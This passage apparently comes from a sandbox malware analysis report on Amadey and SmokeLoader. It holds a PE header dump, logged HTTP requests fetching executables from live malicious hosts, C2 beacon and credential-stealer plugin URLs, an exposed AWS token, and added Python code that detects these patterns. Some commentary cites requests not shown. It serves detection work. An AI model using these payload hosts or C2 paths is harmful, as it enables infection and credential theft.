0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 
a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
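The three 200 OK responses above are served as application/octet-stream and application/x-msdos-program, yet each body starts with the MZ signature and a PE header at the offset stored at 0x3C, so the Content-Type header alone says nothing about what was downloaded. The third body differs from the first two: it begins with MZP, its DOS stub reads "This program must be run under Win32", e_lfanew is 0x100 and the seven sections are named CODE, DATA, BSS, .idata, .edata, .reloc and .rsrc, which is the layout the Borland/Delphi linker produces. The following Python is an added example, not part of the report or of any of the samples; it parses a captured response body the same way, and it builds its own constructed test images rather than reusing the report's hex dumps.

```python
"""Inspect the start of an HTTP response body as a PE image, independent of Content-Type."""
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
MSVC_MSG = b"This program cannot be run in DOS mode"
BORLAND_MSG = b"This program must be run under Win32"


def parse_pe_header(body: bytes):
    """Return DOS-stub and COFF facts about a PE body, or None if it is not a PE.

    Only the first few hundred bytes are needed, so this works on a truncated
    capture such as the 'Data Raw' dumps in a sandbox report.
    """
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, nsections, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size
    names = []
    for i in range(nsections):
        off = table + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes, name first
        if off + 40 > len(body):
            break
        names.append(body[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    stub = body[0x40:e_lfanew]
    message = None
    for marker in (MSVC_MSG, BORLAND_MSG):
        if marker in stub:
            message = marker.decode()
    return {"mzp": body[:3] == b"MZP", "e_lfanew": e_lfanew, "machine": machine,
            "sections": names, "dos_message": message}


def looks_borland_linked(info) -> bool:
    """MZP stub, the Win32 stub message and CODE/DATA/BSS sections together mark a Borland/Delphi link."""
    return bool(info and info["mzp"] and info["dos_message"] == BORLAND_MSG.decode()
                and info["sections"][:3] == ["CODE", "DATA", "BSS"])


def is_executable_download(body: bytes) -> bool:
    """True when the body parses as a PE, whatever the server claimed in Content-Type."""
    return parse_pe_header(body) is not None


def build_sample_pe(mzp: bool, dos_message: bytes, e_lfanew: int, section_names):
    """Constructed minimal image for this example (not bytes copied from the report):
    DOS stub with the message, COFF header, zeroed PE32 optional header, section table."""
    dos = bytearray(e_lfanew)
    dos[0:3] = b"MZP" if mzp else b"MZ\x90"
    dos[0x50:0x50 + len(dos_message)] = dos_message
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386,
                                   len(section_names), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(n.ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + coff + bytes(opt) + table


def sample_delphi_body() -> bytes:
    """Mimics the third response: MZP, Win32 message, e_lfanew 0x100, Borland section names."""
    return build_sample_pe(True, BORLAND_MSG, 0x100,
                           [b"CODE", b"DATA", b"BSS", b".idata", b".edata", b".reloc", b".rsrc"])


def sample_msvc_body() -> bytes:
    """Mimics the first response: MZ, DOS-mode message, e_lfanew 0xE8, four MSVC sections."""
    return build_sample_pe(False, MSVC_MSG, 0xE8, [b".text", b".data", b".rsrc", b".reloc"])


if __name__ == "__main__":
    for body in (sample_delphi_body(), sample_msvc_body(), b"<html>not a pe</html>"):
        info = parse_pe_header(body)
        print(is_executable_download(body), looks_borland_linked(info), info)
```

Run the parser over the first kilobyte of any captured body; the section names and stub message are enough to separate an MSVC build from a Delphi build before any disassembly.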
Source: global traffic HTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
Source: global traffic HTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic HTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
Source: global traffic HTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
Source: global traffic HTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpswfp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdins.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auypktwjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebvtwkfux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqmym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://datryh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajpfnqvlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxihacbmgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upkkyf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgusiwjl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulciihlbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjtfrvl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvydl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtmdotimkr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsqxoged.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahgwjjm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efngjyqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukkwrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebaxoe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqghptenl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ptpfdpcirh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etebl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aexqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aehnv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbybhia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhkewyoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqfbhqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acxiqgb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xawdohy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvlvsvw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jorxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syohyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbmlqnw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: o36fafs3sn6xou.com
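Two beacon patterns stand out in the requests above. The repeated POST to /g84kvj4jck/index.php carries a fixed twelve-field form body (id, vs, sd, os, bi, ar, pc, un, dm, av, lv, og; vs=3.50 is the bot version) which is the Amadey 3.x check-in, matching the Amadey detection in the report header; the same directory appears later in memory with Plugins/cred64.dll and index.php?scr=1, so the path prefix is a better host indicator than the single index.php URL. The long run of POST / to o36fafs3sn6xou.com uses the IE11 user agent and a different fabricated Referer domain on every request, the SmokeLoader beacon behaviour the report also flags. The Python below is an added example, not code from the report or from either malware family; it runs the two checks over a sample request list reconstructed from the lines above (the Request class, field names and thresholds are this example's own choices).

```python
"""Triage sandbox HTTP request summaries: Amadey 3.x check-in schema and Referer-rotating POST / beacons."""
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Field names of the Amadey 3.x check-in body as seen in the POSTs to /g84kvj4jck/index.php.
AMADEY_FIELDS = frozenset("id vs sd os bi ar pc un dm av lv og".split())
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


@dataclass
class Request:
    method: str
    host: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_amadey_checkin(req: Request):
    """Return the decoded check-in fields when the body has exactly the Amadey schema, else None.
    keep_blank_values matters: dm= is sent empty when the host is not domain-joined."""
    if req.method != "POST" or not req.path.endswith("/index.php"):
        return None
    fields = parse_qs(req.body, keep_blank_values=True)
    if set(fields) != AMADEY_FIELDS:
        return None
    return {k: v[0] for k, v in fields.items()}


def referer_rotation(requests, min_distinct=3):
    """Hosts receiving POST / whose Referer names a different domain on successive requests.
    A real form is posted from a handful of referring pages; a beacon that fabricates a
    fresh Referer per request (the o36fafs3sn6xou.com traffic here) is not."""
    seen = {}
    for r in requests:
        ref = r.headers.get("Referer")
        if r.method == "POST" and r.path == "/" and ref:
            seen.setdefault(r.host, set()).add(urlsplit(ref).hostname)
    return {h: sorted(d) for h, d in seen.items() if len(d) >= min_distinct}


def triage(requests):
    """Summarise both indicators plus plain executable fetches (GET of a .exe path)."""
    checkins = [(r.host, parse_amadey_checkin(r)) for r in requests]
    return {
        "amadey_c2": sorted({h for h, c in checkins if c}),
        "amadey_bot_version": next((c["vs"] for _, c in checkins if c), None),
        "referer_rotation": referer_rotation(requests),
        "exe_downloads": sorted(f"{r.host}{r.path}" for r in requests
                                if r.method == "GET" and r.path.lower().endswith(".exe")),
    }


# Sample input reconstructed from the request lines above: one Amadey check-in, one
# multipart upload, three Referer-rotating beacons and two payload fetches.
SAMPLE_REQUESTS = [
    Request("POST", "193.56.146.174", "/g84kvj4jck/index.php",
            {"Content-Type": "application/x-www-form-urlencoded"},
            "id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0"),
    Request("POST", "116.202.5.101", "/",
            {"Content-Type": "multipart/form-data; boundary=----4877482924580855"}),
    Request("POST", "o36fafs3sn6xou.com", "/", {"Referer": "http://debvplifcf.com/", "User-Agent": IE11_UA}),
    Request("POST", "o36fafs3sn6xou.com", "/", {"Referer": "http://kpswfp.com/", "User-Agent": IE11_UA}),
    Request("POST", "o36fafs3sn6xou.com", "/", {"Referer": "http://sdins.com/", "User-Agent": IE11_UA}),
    Request("GET", "srshf.com", "/mmm.exe", {"User-Agent": IE11_UA}),
    Request("GET", "193.56.146.168", "/mia/solt.exe", {"User-Agent": IE11_UA}),
]

if __name__ == "__main__":
    print(triage(SAMPLE_REQUESTS))
```

The schema check is deliberately exact: a body with the same twelve keys and nothing else is a stronger signal than any one value, and it survives the bot id, version and host fields changing between victims. The Referer check needs a few requests per host before it fires, which is why it is run over the whole capture rather than per request.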
Source: C:\Windows\explorer.exe DNS query: name: u.to
Source: Joe Sandbox View ASN Name: ITOOLS-ASiToolsJSCMN ITOOLS-ASiToolsJSCMN
Source: Joe Sandbox View ASN Name: UTA-ASAT UTA-ASAT
Source: Joe Sandbox View IP Address: 195.96.151.51 195.96.151.51
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://116.202.2.1:80
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://116.202.2.1:80checkmyprofileonthispage0;open_open
Source: 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101/1148
Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101/659169136515.zip:bV
Source: 86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101:80
Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101:80/659169136515.zip
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/=0&pc=065367&un=user&dm=&av=13&lv=0&og=0tK
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/U8eZkQ0Y1ZtSx2oLs
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dll
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllM
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllal
